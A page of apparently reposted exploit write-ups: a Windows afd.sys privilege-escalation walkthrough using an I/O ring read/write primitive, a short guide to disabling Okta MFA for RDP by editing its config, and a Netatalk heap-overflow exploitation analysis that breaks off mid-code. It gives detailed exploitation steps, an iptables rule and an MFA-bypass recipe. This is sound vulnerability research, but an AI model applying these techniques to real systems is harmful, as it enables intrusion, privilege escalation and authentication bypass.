We came across some code published by x86matthew that performs socket operations by calling into the AFD driver directly, forgoing the Winsock library. This is interesting from a stealth perspective, but for our purposes, it is a nice template to create a handle to a TCP socket to make IOCTL requests to the AFD driver. From there, we were able to reach the target function, as evidenced by reaching a breakpoint set in WinDbg while kernel debugging.

Figure 9 — afd!AfdNotifySock breakpoint

Now, refer back to the function prototype for 

DeviceIoControl
, through which we call into the AFD driver from user space. One of the parameters, 
lpInBuffer
, is a user mode buffer. As mentioned in the previous section, the vulnerability occurs because the user is able to pass an unvalidated pointer to the driver within an unknown data structure. This structure is passed in directly from our user mode application via the lpInBuffer parameter. It’s passed into 
AfdNotifySock
 as the fourth parameter, and into 
AfdNotifyRemoveIoCompletion
 as the third parameter.

At this point, we don’t know how to populate the data in 

lpInBuffer
, which we’ll call 
AFD_NOTIFYSOCK_STRUCT
, in order to pass the checks required to reach the vulnerable code path in 
AfdNotifyRemoveIoCompletion
. The remainder of our reverse engineering process consisted of following the execution flow and examining how to reach the vulnerable code.

Let’s go through each of the checks.

The first check we encounter is at the beginning of 

AfdNotifySock
:

Figure 10 — afd!AfdNotifySock size check

This check tells us that the size of the 

AFD_NOTIFYSOCK_STRUCT
 should be equal to 
0x30
 bytes, otherwise the function fails with 
STATUS_INFO_LENGTH_MISMATCH
.

The next check validates values in various fields in our structure:

Figure 11 — afd!AfdNotifySock structure validation

At the time we didn’t know what any of the fields correspond to, so we pass in a 

0x30
 byte array filled with 
0x41
 bytes (
AAAAAAAAA...
).

The next check we encounter is after a call to 

<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obreferenceobjectbyhandle" target="_blank">ObReferenceObjectByHandle</a>
. This function takes the first field of our input structure as its first argument.

Figure 12 — afd!AfdNotifySock call nt!ObReferenceObjectByHandle

The call must return success in order to proceed to the correct code execution path, which means that we must pass in a valid handle to an 

IoCompletionObject
. There is no officially documented way to create an object of that type via Win32 API. However, after some searching, we found an undocumented NT function 
<a href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FIoCompletion%2FNtCreateIoCompletion.html" target="_blank" rel="noreferrer noopener">NtCreateIoCompletion</a>
 that did the job.

Afterward, we reach a loop whose counter was one of the values from our struct:

Figure 13 — afd!AfdNotifySock loop

This loop checked a field from our structure to verify it contained a valid user mode pointer and copied data to it. The pointer is incremented after each iteration of the loop. We filled in the pointers with valid addresses and set the counter to 1. From here, we were able to finally reach the vulnerable function 

AfdNotifyRemoveIoCompletion
.

Figure 14 — afd!AfdNotifyRemoveIoCompletion call

Once inside 

AfdNotifyRemoveIoCompletion
, the first check is on another field in our structure. It must be non-zero. It’s then multiplied by 0x20 and passed into 
ProbeForWrite
 along with another field in our struct as the pointer parameter. From here we can fill in the struct further with a valid user mode pointer (
pData2
) and field 
dwLen = 1
 (so that the total size passed to 
ProbeForWrite
 is equal 0x20), and the checks pass.

Figure 15 — afd! Afd!AfdNotifyRemoveIoCompletion field check

Finally, the last check to pass before reaching the target code is a call to 

IoRemoveCompletion
 which must return 0 (
STATUS_SUCCESS
).

This function will block until either:

  • A completion record becomes available for the 
    IoCompletionObject
     parameter
  • The timeout expires, which is passed in as a parameter of the function

We control the timeout value via our structure, but simply setting a timeout of 0 is not sufficient for the function to return success. In order for this function to return with no errors, there must be at least one completion record available. After some research, we found the undocumented function 

<a rel="noreferrer noopener" href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FIoCompletion%2FNtSetIoCompletion.html" target="_blank">NtSetIoCompletion</a>
, which manually increments the I/O pending counter on an 
IoCompletionObject
. Calling this function on the 
IoCompletionObject
 we created earlier ensures that the call to 
IoRemoveCompletion
 returns 
STATUS_SUCCESS
.

Figure 16 — afd!AfdNotifyRemoveIoCompletion check return nt!IoRemoveIoCompletion

Triggering Arbitrary Write-Where

Now that we can reach the vulnerable code, we can fill the appropriate field in our structure with an arbitrary address to write to.  The value that we write to the address comes from an integer whose pointer is passed into the call to 

IoRemoveIoCompletion
IoRemoveIoCompletion
 sets the value of this integer to the return value of a call to 
KeRemoveQueueEx
.

Figure 17 — nt!KeRemoveQueueEx return value
Figure 18 — nt!KeRemoveQueueEx return use

In our proof of concept, this write value is always equal to 

0x1
. We speculated that the return value of 
KeRemoveQueueEx
 is the number of items removed from the queue, but did not investigate further. At this point, we had the primitive we needed and moved on to finishing the exploit chain. We later confirmed that this guess was correct, and the write value can be arbitrarily incremented by additional calls to 
NtSetIoCompletion
 on the 
IoCompletionObject
.

LPE with IORING

With the ability to write a fixed value (0x1) at an arbitrary kernel address, we proceeded to turn this into a full arbitrary kernel Read/Write. Because this vulnerability affects the latest versions of Windows 11(22H2), we chose to leverage a Windows I/O ring object corruption to create our primitive. Yarden Shafir has written a number of excellent posts on Windows I/O rings and also developed and disclosed the primitive that we leveraged in our exploit chain. As far as we are aware this is the first instance where this primitive has been used in a public exploit.

When an I/O Ring is initialized by a user two separate structures are created, one in user space and one in kernel space. These structures are shown below.

The kernel object maps to 

nt!_IORING_OBJECT
 and is shown below.

Figure 19 — nt!_IORING_OBJECT initialization

Note that the kernel object has two fields, 

RegBuffersCount
 and 
RegBuffers
, which are zeroed on initialization. The count indicates how may I/O operations can possibly be queued for the I/O ring. The other parameter is a pointer to a list of the currently queued operations.

On the user space side, when calling 

<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/ioringapi/nf-ioringapi-createioring" target="_blank">kernelbase!CreateIoRing</a>
 you get back an I/O Ring handle on success. This handle is a pointer to an undocumented structure (HIORING). Our definition of this structure was obtained from the research done by Yarden Shafir.

typedef struct _HIORING {

    HANDLE handle;

    NT_IORING_INFO Info;

    ULONG IoRingKernelAcceptedVersion;

    PVOID RegBufferArray;

    ULONG BufferArraySize;

    PVOID Unknown;

    ULONG FileHandlesCount;

    ULONG SubQueueHead;

    ULONG SubQueueTail;

};

If a vulnerability, such as the one covered in this blog post, allows you to update the 

RegBuffersCount
 and 
RegBuffers
 fields, then it is possible to use standard I/O Ring APIs to read and write kernel memory.

As we saw above, we are able to use the vulnerability to write 

0x1
 at any kernel address that we like. To set up the I/O ring primitive we can simply trigger the vulnerability twice.

In the first trigger we set the 

RegBufferCount
 to 
0x1
.

Figure 20 — nt!_IORING_OBJECT first time triggering the bug

And in the second trigger we set 

RegBuffers
 to an address that we can allocate in user space (like 
0x0000000100000000
).

Figure 21 — nt!_IORING_OBJECT second time triggering the bug

All that remains is to queue I/O operations by writing pointers to forged 

nt!_IOP_MC_BUFFER_ENTRY
 structures at the user space address (
0x100000000
). The number of entries should be equal to 
RegBuffersCount
. This process is highlighted in the diagram below.

Figure 22 — Setting up user space for I/O Ring kernel R/W primitive

One such 

nt!_IOP_MC_BUFFER_ENTRY
 is shown in the screenshot below. Note that the destination of the operation is a kernel address (
0xfffff8052831da20
) and that the size of the operation, in this case, is 
0x8
 bytes. It is not possible to tell from the structure if this is a read or write operation. The direction of the operation depends on which API was used to queue the I/O request. Using 
<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/ioringapi/nf-ioringapi-buildioringreadfile" target="_blank">kernelbase!BuildIoRingReadFile</a>
 results in an arbitrary kernel write and 
kernelbase!BuildIoRingWriteFile
 results in an arbitrary kernel read.

Figure 23 — Example faked I/O Ring operation

To perform an arbitrary write, an I/O operation is tasked to read data from a file handle and write that data to a Kernel address.

Figure 24 — I/O Ring arbitrary write

Conversely, to perform an arbitrary read, an I/O operation is tasked to read data at a kernel address and write that data to a file handle.

Figure 25 – I/O Ring arbitrary read

Demo

With the primitive set up all that remains is using some standard kernel post-exploitation techniques to leak the token of an elevated process like System (PID 4) and overwrite the token of a different process.

Exploitation In the Wild

After the public release of our exploit code, Xiaoliang Liu (@flame36987044) from 360 Icesword Lab disclosed publicly for the first time, that they discovered a sample exploiting this vulnerability in the wild (ITW) earlier this year. The technique utilized by the ITW sample differed from ours. The attacker triggers the vulnerability using the corresponding Winsock API function, 

ProcessSocketNotifications
, instead of calling into the 
afd.sys
 driver directly, like in our exploit.  

The official statement from 360 Icesword Lab is as follows:  
 
“360 IceSword Lab focuses on APT detection and defense. Based on our 0day vulnerability radar system, we discovered an exploit sample of CVE-2023-21768 in the wild in January this year, which differs from the exploits announced by @chompie1337 and @FuzzySec in that it is exploited through system mechanisms and vulnerability features. The exploit is related to 

NtSetIoCompletion
 and 
ProcessSocketNotifications
ProcessSocketNotifications
 gets the number of times 
NtSetIoCompletion
 is called, so we use this to change the privilege count.”  

Conclusion and Final Reflections

You may notice that in some parts of the reverse engineering our analysis is superficial. It’s sometimes helpful to only observe some relevant state changes and treat portions of the program as a black box, to avoid getting led down an irrelevant rabbit hole. This allowed us to turn around an exploit quickly, even though maximizing the completion speed was not our goal.

Additionally, we conducted a patch diffing review of all the reported vulnerabilities in 

afd.sys
 indicated as “Exploitation More Likely”. Our review revealed that all except two of the vulnerabilities were a result of improper validation of pointers passed in from user mode. This shows that having a historical knowledge of past vulnerabilities, particularly within a specific target, can be fruitful for finding new vulnerabilities. When the code base is expanded – the same mistakes are likely to be repeated. Remember, new C code == new bugs . As evidenced by the discovery of the aforementioned vulnerability being exploited in the wild, it is safe to say that attackers are closely monitoring new code base additions as well. 

The lack of support for Supervisor Mode Access Protection (SMAP) in the Windows kernel leaves us with plentiful options to construct new data-only exploit primitives. These primitives aren’t feasible in other operating systems that support SMAP. For example, consider CVE-2021-41073, a vulnerability in Linux’s implementation of I/O Ring pre-registered buffers, (the same feature we abuse in Windows for a R/W primitive). This vulnerability can allow overwriting a kernel pointer for a registered buffer, but it cannot be used to construct an arbitrary R/W primitive because if the pointer is replaced with a user pointer, and the kernel tries to read or write there, the system will crash.

Despite best efforts by Microsoft to kill beloved exploit primitives, there are bound to be new primitives to be discovered that take their place. We were able to exploit the latest version of Windows 11 22H2 without encountering any mitigations or constraints from Virtualization Based Security features such as HVCI.

References

Bypassing Okta MFA Credential Provider for Windows

Bypassing Okta MFA Credential Provider for Windows

Original text by n00py

I’ll state this upfront, so as not to confuse: This is a POST exploitation technique. This is mostly for when you have already gained admin on the system via other means and want to be able to RDP without needing MFA.

Okta MFA Credential Provider for Windows enables strong authentication using MFA with Remote Desktop Protocol (RDP) clients. Using Okta MFA Credential Provider for Windows, RDP clients (Windows workstations and servers) are prompted for MFA when accessing supported domain joined Windows machines and servers.

– https://help.okta.com/en-us/Content/Topics/Security/proc-mfa-win-creds-rdp.htm

This is going to be very similar to my other post about Bypassing Duo Two-Factor Authentication. I’d recommend reading that first to provide context to this post.

Biggest difference between Duo and Okta is that Okta does not have fail open as the default value, making it less likely of a configuration. It also does not have “RDP Only” as the default, making the console bypass also less likely to be successful.

With that said, if you do have administrator level shell access, it is quite simple to disable.

For Okta, the configuration file is not stored in the registry like Duo but in a configuration file located at:

 C:\Program Files\Okta\Okta Windows Credential Provider\config\rdp_app_config.json

There are two things you need to do:

  • Modify the InternetFailOpenOption value to true
  • Change the Url value to something that will not resolve.

After that, attempts to RDP will not prompt Okta MFA.

It is of course always possible to uninstall the software as an admin, but ideally we want to achieve our objective with the least intrusive means possible. These configuration files can easily be flipped back when you are done.

EXPLOITING A REMOTE HEAP OVERFLOW WITH A CUSTOM TCP STACK

EXPLOITING A REMOTE HEAP OVERFLOW WITH A CUSTOM TCP STACK

Original text by Etienne Helluy-Lafont , Luca Moro  Exploit — Download

Vulnerability details and analysis

ENVIRONMENT

The Western Digital MyCloudHome is a consumer grade NAS with local network and cloud based functionalities. At the time of the contest (firmware 7.15.1-101) the device ran a custom Android distribution on a armv8l CPU. It exposed a few custom services and integrated some open source ones such as the Netatalk daemon. This service was a prime target to compromise the device because it was running with root privileges and it was reachable from adjacent network. We will not discuss the initial surface discovery here to focus more on the vulnerability. Instead we provide a detailed analysis of the vulnerabilty and how we exploited it.

Netatalk [2] is a free and Open Source [3] implementation of the Apple Filing Protocol (AFP) file server. This protocol is used in networked macOS environments to share files between devices. Netatalk is distributed via the service afpd, also available on many Linux distributions and devices. So the work presented in this article should also apply to other systems.
Western Digital modified the sources a bit to accommodate the Android environment [4], but their changes are not relevant for this article so we will refer to the official sources.

AFP data is carried over the Data Stream Interface (DSI) protocol [5]. The exploited vulnerability lies in the DSI layer, which is reachable without any form of authentication.

OVERVIEW OF SERVER IMPLEMENTATION

The DSI layer

The server is implemented as an usual fork server with a parent process listening on the TCP port 548 and forking into new children to handle client sessions. The protocol exchanges different packets encapsulated by Data Stream Interface (DSI) headers of 16 bytes.

#define DSI_BLOCKSIZ 16
struct dsi_block {
    uint8_t dsi_flags;       /* packet type: request or reply */
    uint8_t dsi_command;     /* command */
    uint16_t dsi_requestID;  /* request ID */
    union {
        uint32_t dsi_code;   /* error code */
        uint32_t dsi_doff;   /* data offset */
    } dsi_data;
    uint32_t dsi_len;        /* total data length */
    uint32_t dsi_reserved;   /* reserved field */
};

A request is usually followed by a payload which length is specified by the 

dsi_len
 field.

The meaning of the payload depends on what 

dsi_command
 is used. A session should start with the 
dsi_command
 byte set as 
DSIOpenSession (4)
. This is usually followed up by various 
DSICommand (2)
 to access more functionalities of the file share. In that case the first byte of the payload is an AFP command number specifying the requested operation.

dsi_requestID
 is an id that should be unique for each request, giving the chance for the server to detect duplicated commands.
As we will see later, Netatalk implements a replay cache based on this id to avoid executing a command twice.

It is also worth mentioning that the AFP protocol supports different schemes of authentication as well as anonymous connections.
But this is out of the scope of this write-up as the vulnerability is located in the DSI layer, before AFP authentication.

Few notes about the server implementation

The DSI struct

To manage a client in a child process, the daemon uses a 

DSI *dsi
 struct. This represents the current connection, with its buffers and it is passed into most of the Netatalk functions. Here is the struct definition with some members edited out for the sake of clarity:

#define DSI_DATASIZ       65536

/* child and parent processes might interpret a couple of these
 * differently. */
typedef struct DSI {
    /* ... */
    struct dsi_block        header;
    /* ... */
    uint8_t  *commands;            /* DSI receive buffer */
    uint8_t  data[DSI_DATASIZ];    /* DSI reply buffer */
    size_t   datalen, cmdlen;
    off_t    read_count, write_count;
    uint32_t flags;             /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
    int      socket;            /* AFP session socket */
    int      serversock;        /* listening socket */

    /* DSI readahead buffer used for buffered reads in dsi_peek */
    size_t   dsireadbuf;        /* size of the DSI read ahead buffer used in dsi_peek() */
    char     *buffer;           /* buffer start */
    char     *start;            /* current buffer head */
    char     *eof;              /* end of currently used buffer */
    char     *end;

    /* ... */
} DSI;

We mainly see that the struct has:

  • The 
    command
     heap buffer used for receiving the user input, initialized in 
    dsi_init_buffer()
     with a default size of 1MB ;
  • cmdlen
     to specify the size of the input in 
    command
     ;
  • An inlined 
    data
     buffer of 64KB used for the reply ;
  • datalen
     to specify the size of the output in 
    data
     ;
  • A read ahead heap buffer managed by the pointers 
    buffer
    start
    eof
    end
    , with a default size of 12MB also initialized in 
    dsi_init_buffer()
    .

 

The main loop flow

After receiving 

DSIOpenSession
 command, the child process enters the main loop in 
afp_over_dsi()
. This function dispatches incoming commands until the end of the communication. Its simplified code is the following:

void afp_over_dsi(AFPObj *obj)
{
    DSI *dsi = (DSI *) obj->dsi;
    /* ... */
    /* get stuck here until the end */
    while (1) {
        /* ... */
        /* Blocking read on the network socket */
        cmd = dsi_stream_receive(dsi);
        /* ... */

        switch(cmd) {
        case DSIFUNC_CLOSE:
            /* ... */
        case DSIFUNC_TICKLE:
            /* ...*/
        case DSIFUNC_CMD:
            /* ... */
            function = (u_char) dsi->commands[0];
            /* ... */
            err = (*afp_switch[function])(obj, dsi->commands, dsi->cmdlen, &dsi->data, &dsi->datalen);
            /* ... */
        default:
            LOG(log_info, logtype_afpd,"afp_dsi: spurious command %d", cmd);
            dsi_writeinit(dsi, dsi->data, DSI_DATASIZ);
            dsi_writeflush(dsi);
            break;
        }

The receiving process

In the previous snippet, we saw that an idling server will receive the client data in 

dsi_stream_receive()
. Because of the buffering attempts this function is a bit cumbersome. Here is an overview of the whole receiving process within 
dsi_stream_receive()
.

dsi_stream_receive(DSI* dsi)
 
  1. define char block[DSI_BLOCKSIZ] in its stack to receive a DSI header
 
  2. dsi_buffered_stream_read(dsi, block, sizeof(block)) wait for a DSI header
    
    1. from_buf(dsi, block, length)
       Tries to fetch available data from already buffered input
       in-between dsi->start and dsi->end
    
    2. recv(dsi->socket, dsi->eof, buflen, 0)
       Tries to receive at most 8192 bytes in a buffering attempt into the look ahead buffer
       The socket is non blocking so the call usually fails
    
    3. dsi_stream_read(dsi, block, len))
      
      1. buf_read(dsi, block, len)
        
        1. from_buf(dsi, block, len)
           Tries again to get data from the buffered input
        
        2. readt(dsi->socket, block, len, 0, 0);
           Receive data on the socket
           This call will wait on a recv()/select() loop and is usually the blocking one

  3. Populate &dsi->header from what has been received

  4. dsi_stream_read(dsi, dsi->commands, dsi->cmdlen)
        
    1. calls buf_read() to fetch the DSI payload
       If not enough data is available, the call wait on select()

The main point to notice here is that the server is only buffering the client data in the 

recv()
 of 
dsi_buffered_stream_read()
 when multiple or large commands are sent as one. Also, never more than 8KB are buffered.

THE VULNERABILITY

As seen in the previous snippets, in the main loop, 

afp_over_dsi()
 can receive an unknown command id. In that case the server will call 
dsi_writeinit(dsi, dsi-&gt;data, DSI_DATASIZ)
 then 
dsi_writeflush(dsi)
.

We assume that the purpose of those two functions is to flush both the input and the output buffer, eventually purging the look ahead buffer. However these functions are really peculiar and calling them here doesn’t seem correct. Worst, 

dsi_writeinit()
has a buffer overflow vulnerability! Indeed the function will flush out bytes from the look ahead buffer into its second argument 
dsi->data
 without checking the size provided into the third argument 
DSI_DATASIZ
.

size_t dsi_writeinit(DSI *dsi, void *buf, const size_t buflen _U_)
{
    size_t bytes = 0;
    dsi->datasize = ntohl(dsi->header.dsi_len) - dsi->header.dsi_data.dsi_doff;

    if (dsi->eof > dsi->start) {
        /* We have data in the buffer */
        bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
        memmove(buf, dsi->start, bytes);    // potential overflow here
        dsi->start += bytes;
        dsi->datasize -= bytes;
        if (dsi->start >= dsi->eof)
            dsi->start = dsi->eof = dsi->buffer;
    }

    LOG(log_maxdebug, logtype_dsi, "dsi_writeinit: remaining DSI datasize: %jd", (intmax_t)dsi->datasize);

    return bytes;
}

In the above code snippet, both variables 

dsi-&gt;header.dsi_len
 and 
dsi-&gt;header.dsi_data.dsi_doff
 were set up in 
dsi_stream_receive()
 and are controlled by the client. So 
dsi-&gt;datasize
 is client controlled and depending on 
MIN(dsi-&gt;eof - dsi-&gt;start, dsi-&gt;datasize)
, the following memmove could in theory overflow 
buf
 (here 
dsi-&gt;data
). This may lead to a corruption of the tail of the 
dsi
 struct as 
dsi-&gt;data
 is an inlined buffer.

However there is an important limitation: 

dsi-&gt;data
 has a size of 64KB and we have seen that the implementation of the look ahead buffer will at most read 8KB of data in 
dsi_buffered_stream_read()
. So in most cases 
dsi-&gt;eof - dsi-&gt;start
 is less than 8KB and that is not enough to overflow 
dsi-&gt;data
.

Fortunately, there is still a complex way to buffer more than 8KB of data and to trigger this overflow. The next parts explain how to reach that point and exploit this vulnerability to achieve code execution.

Exploitation

TRIGGERING THE VULNERABILITY

Finding a way to push data in the look ahead buffer

 

The curious case of dsi_peek()

While the receiving process is not straightforward, the sending one is even more confusing. There are a lot of different functions involved to send back data to the client and an interesting one is 

dsi_peek(DSI *dsi)
.

Here is the function documentation:

/*
 * afpd is sleeping too much while trying to send something.
 * May be there's no reader or the reader is also sleeping in write,
 * look if there's some data for us to read, hopefully it will wake up
 * the reader so we can write again.
 *
 * @returns 0 when is possible to send again, -1 on error
 */
 static int dsi_peek(DSI *dsi)

In other words, 

dsi_peek()
 will take a pause during a blocked send and might try to read something if possible. This is done in an attempt to avoid potential deadlocks between the client and the server. The good thing is that the reception is buffered:

static int dsi_peek(DSI *dsi)
{
    /* ... */

    while (1) {
        /* ... */
        FD_ZERO(&readfds);
        FD_ZERO(&writefds);

        if (dsi->eof < dsi->end) {
            /* space in read buffer */
            FD_SET( dsi->socket, &readfds);
        } else { /* ... */ }

        FD_SET( dsi->socket, &writefds);

        /* No timeout: if there's nothing to read nor nothing to write,
         * we've got nothing to do at all */
        if ((ret = select( maxfd, &readfds, &writefds, NULL, NULL)) <= 0) {
            if (ret == -1 && errno == EINTR)
                /* we might have been interrupted by out timer, so restart select */
                continue;
            /* give up */
            LOG(log_error, logtype_dsi, "dsi_peek: unexpected select return: %d %s",
                ret, ret < 0 ? strerror(errno) : "");
            return -1;
        }

        if (FD_ISSET(dsi->socket, &writefds)) {
            /* we can write again */
            LOG(log_debug, logtype_dsi, "dsi_peek: can write again");
            break;
        }

        /* Check if there's sth to read, hopefully reading that will unblock the client */
        if (FD_ISSET(dsi->socket, &readfds)) {
            len = dsi->end - dsi->eof; /* it's ensured above that there's space */

            if ((len = recv(dsi->socket, dsi->eof, len, 0)) <= 0) {
                if (len == 0) {
                    LOG(log_error, logtype_dsi, "dsi_peek: EOF");
                    return -1;
                }
                LOG(log_error, logtype_dsi, "dsi_peek: read: %s", strerror(errno));
                if (errno == EAGAIN)
                    continue;
                return -1;
            }
            LOG(log_debug, logtype_dsi, "dsi_peek: read %d bytes", len);

            dsi->eof += len;
        }
    }

Here we see that if the 

select()
 returns with 
dsi-&gt;socket
 set as readable and not writable, 
recv()
 is called with 
dsi-&gt;eof
. This looks like a way to push more than 64KB of data into the look ahead buffer to later trigger the vulnerability.

One question remains: how to reach dsi_peek()?

 

Reaching dsi_peek()

While there are multiple ways to get into that function, we focused on the 

dsi_cmdreply()
 call path. This function is used to reply to a client request, which is done with most AFP commands. For instance sending a request with 
DSIFUNC_CMD
 and the AFP command 
0x14
 will trigger a logout attempt, even for an un-authenticated client and reach the following call stack:

afp_over_dsi()
dsi_cmdreply(dsi, err)
dsi_stream_send(dsi, dsi->data, dsi->datalen);
dsi_stream_write(dsi, block, sizeof(block), 0)

From there the following code is executed:

ssize_t dsi_stream_write(DSI *dsi, void *data, const size_t length, int mode)
{

  /* ... */
  while (written < length) {
      len = send(dsi->socket, (uint8_t *) data + written, length - written, flags);
      if (len >= 0) {
          written += len;
          continue;
      }

      if (errno == EINTR)
          continue;

      if (errno == EAGAIN || errno == EWOULDBLOCK) {
          LOG(log_debug, logtype_dsi, "dsi_stream_write: send: %s", strerror(errno));

          if (mode == DSI_NOWAIT && written == 0) {
              /* DSI_NOWAIT is used by attention give up in this case. */
              written = -1;
              goto exit;
          }

          /* Try to read sth. in order to break up possible deadlock */
          if (dsi_peek(dsi) != 0) {
              written = -1;
              goto exit;
          }
          /* Now try writing again */
          continue;
      }

      /* ... */

In the above code, we see that in order to reach 

dsi_peek()
 the call to 
send()
 has to fail.

 

Summarizing the objectives and the strategy

So to summarize, in order to push data into the look ahead buffer one can:

  1. Send a logout command to reach 
    dsi_cmdreply
    .
  2. In 
    dsi_stream_write
    , find a way to make the 
    send()
     syscall fail.
  3. In 
    dsi_peek()
     find a way to make 
    select()
     only returns a readable socket.

Getting a remote system to fail at sending data, while maintaining the stream open is tricky. One funny way to do that is to mess up with the TCP networking layer. The overall strategy is to have a custom TCP stack that will simulate a network congestion once a logout request is sent, but only in one direction. The idea is that the remote application will think that it can not send any more data, while it can still receive some.

Because there are a lot of layers involved (the networking card layer, the kernel buffering, the remote TCP congestion avoidance algorithm, the userland stack (?)) it is non trivial to find the optimal way to achieve the goals. But the chosen approach is a mix between two techniques:

  • Zero’ing the TCP windows of the client side, letting the remote one think our buffer is full ;
  • Stopping sending ACK packets for the server replies.

This strategy seems effective enough and the exploit manages to enter the wanted codepath within a few seconds.

Writing a custom TCP stack

To achieve the described strategy we needed to re-implement a TCP networking stack. Because we did not want to get into low-levels details, we decided to use scapy [6] and implemented it in Python over raw sockets.

The class 

RawTCP
 of the exploit is the result of this development. It is basic and slow and it does not handle most of the specific aspects of TCP (such as packets re-ordering and re-transmission). However, because we expect the targeted device to be in the same network without networking reliability issues, the current implementation is stable enough.

The most noteworthy details of 

RawTCP
 is the attribute 
reply_with_ack
 that could be set to 0 to stop sending ACK and 
window
 that is used to advertise the current buffer size.

One prerequisite of our exploit is that the attacker kernel must be «muzzled down» so that it doesn’t try to interpret incoming and unexpected TCP segments.
Indeed the Linux TCP stack is not aware of our shenanigans on the TCP connection and he will try to kill it by sending RST packets.

One can prevent Linux from sending RST packets to the target, with an iptables rule like this:

# iptables -I OUTPUT -p tcp -d TARGET_IP --dport 548 --tcp-flags RST RST -j DROP

Triggering the bug

To sum up, here is how we managed to trigger the bug. The code implementing this is located in the function 

do_overflow
 of the exploit:

  1. Open a session by sending DSIOpenSession.
  2. In a bulk, send a lot of DSICommand requests with the logout function 0x14 to force the server to get into dsi_cmdreply().
    From our tests 3000 commands seems enough for the targeted hardware.
  3. Simulate a congestion by advertising a TCP windows size of 0 while stopping to ACK reply the server replies.
    After a short while the server should be stuck in dsi_peek() being only capable of receiving data.
  4. Send a DSI dummy and invalid command with a dsi_len and payload larger than 64KB.
    This command is received in dsi_peek() and later consumed in dsi_stream_receive() / dsi_stream_read() / buf_read().
    In the exploit we use the command id DSIFUNC_MAX+1 to enter the default case of the afp_over_dsi() switch.
  5. Send a block of raw data larger than 64KB.
    This block is also received in dsi_peek() while the server is blocked but is consumed in dsi_writeinit() by overflowing dsi->data and the tail of the dsi struct.
  6. Start to acknowledge again the server replies (3000) by sending ACK back and a proper TCP window size.
    This triggers the handling of the logout commands that were not handled before the obstruction, then the invalid command to reach the overflow.

The whole process is done pretty quickly in a few seconds, depending on the setup (usually less than 15s).

GETTING A LEAK

To exploit the server, we need to know where the main binary (apfd) is loaded in memory. The server runs with Address Space Layout Randomization (ASLR) enabled, therefore the base address of apfd changes each time the server gets started. Fortunately for us, apfd forks before handling a client connection, so the base address will remain the same across all connections even if we crash a forked process.

In order to defeat ASLR, we need to leak a pointer to some known memory location in the apfd binary. To obtain this leak, we can use the overflow to corrupt the tail of the 

dsi
 struct (after the data buffer) to force the server to send us more data than expected. The command replay cache feature of the server provides a convenient way to do so.

Here are the relevant part of the main loop of 

afp_over_dsi()
:

/ in afp_over_dsi()
    case DSIFUNC_CMD:

        function = (u_char) dsi->commands[0];

        /* AFP replay cache */
        rc_idx = dsi->clientID % REPLAYCACHE_SIZE;
        LOG(log_debug, logtype_dsi, "DSI request ID: %u", dsi->clientID);

        if (replaycache[rc_idx].DSIreqID == dsi->clientID
            && replaycache[rc_idx].AFPcommand == function) {

            LOG(log_note, logtype_afpd, "AFP Replay Cache match: id: %u / cmd: %s",
                dsi->clientID, AfpNum2name(function));
            err = replaycache[rc_idx].result;

            /* AFP replay cache end */

        } else {
                dsi->datalen = DSI_DATASIZ;
                dsi->flags |= DSI_RUNNING;
            /* ... */

            if (afp_switch[function]) {
                /* ... */
                err = (*afp_switch[function])(obj,
                                              (char *)dsi->commands, dsi->cmdlen,
                                              (char *)&dsi->data, &dsi->datalen);

                /* ... */
                /* Add result to the AFP replay cache */
                replaycache[rc_idx].DSIreqID = dsi->clientID;
                replaycache[rc_idx].AFPcommand = function;
                replaycache[rc_idx].result = err;
            }
        }
        /* ... */
        dsi_cmdreply(dsi, err)

        /* ... */

Here is the code for 

dsi_cmdreply()
:

int dsi_cmdreply(DSI *dsi, const int err)
{
    int ret;

    LOG(log_debug, logtype_dsi, "dsi_cmdreply(DSI ID: %u, len: %zd): START",
        dsi->clientID, dsi->datalen);

    dsi->header.dsi_flags = DSIFL_REPLY;
    dsi->header.dsi_len = htonl(dsi->datalen);
    dsi->header.dsi_data.dsi_code = htonl(err);

    ret = dsi_stream_send(dsi, dsi->data, dsi->datalen);

    LOG(log_debug, logtype_dsi, "dsi_cmdreply(DSI ID: %u, len: %zd): END",
        dsi->clientID, dsi->datalen);

    return ret;
}

When the server receives the same command twice (same 

clientID
 and 
function
), it takes the replay cache code path which calls 
dsi_cmdreply()
 without initializing 
dsi-&gt;datalen
. So in that case, 
dsi_cmdreply()
 will send  
dsi-&gt;datalen
 bytes of 
dsi-&gt;data
 back to the client in 
dsi_stream_send()
.

This is fortunate because the 

datalen
 field is located just after the data buffer in the struct DSI. That means that to control 
datalen
 we just need to trigger the overflow with 65536 + 4 bytes (4 being the size of a size_t).

Then, by sending a 

DSICommand
 command with an already used 
clientID
 we reach a 
dsi_cmdreply()
 that can send back all the 
dsi-&gt;data
 buffer, the tail of the 
dsi
 struct and part of the following heap data. In the 
dsi
 struct tail, we get some heap pointers such as 
dsi-&gt;buffer
dsi-&gt;start
dsi-&gt;eof
dsi-&gt;end
. This is useful because we now know where client controlled data is stored.
In the following heap data, we hopefully expect to find pointers into afpd main image.

From our experiments we found out that most of the time, by requesting a leak of 2MB+64KB we get parts of the heap where 

hash_t
 objects were allocated by 
hash_create()
:

typedef struct hash_t {
    #if defined(HASH_IMPLEMENTATION) || !defined(KAZLIB_OPAQUE_DEBUG)
    struct hnode_t **hash_table;        /* 1 */
    hashcount_t hash_nchains;           /* 2 */
    hashcount_t hash_nodecount;         /* 3 */
    hashcount_t hash_maxcount;          /* 4 */
    hashcount_t hash_highmark;          /* 5 */
    hashcount_t hash_lowmark;           /* 6 */
    hash_comp_t hash_compare;           /* 7 */
    hash_fun_t hash_function;           /* 8 */
    hnode_alloc_t hash_allocnode;
    hnode_free_t hash_freenode;
    void *hash_context;
    hash_val_t hash_mask;           /* 9 */
    int hash_dynamic;               /* 10 */
    #else
    int hash_dummy;
    #endif
} hash_t;

hash_t *hash_create(hashcount_t maxcount, hash_comp_t compfun,
                    hash_fun_t hashfun)
{
    hash_t *hash;

    if (hash_val_t_bit == 0)    /* 1 */
        compute_bits();

    hash = malloc(sizeof *hash);    /* 2 */

    if (hash) {     /* 3 */
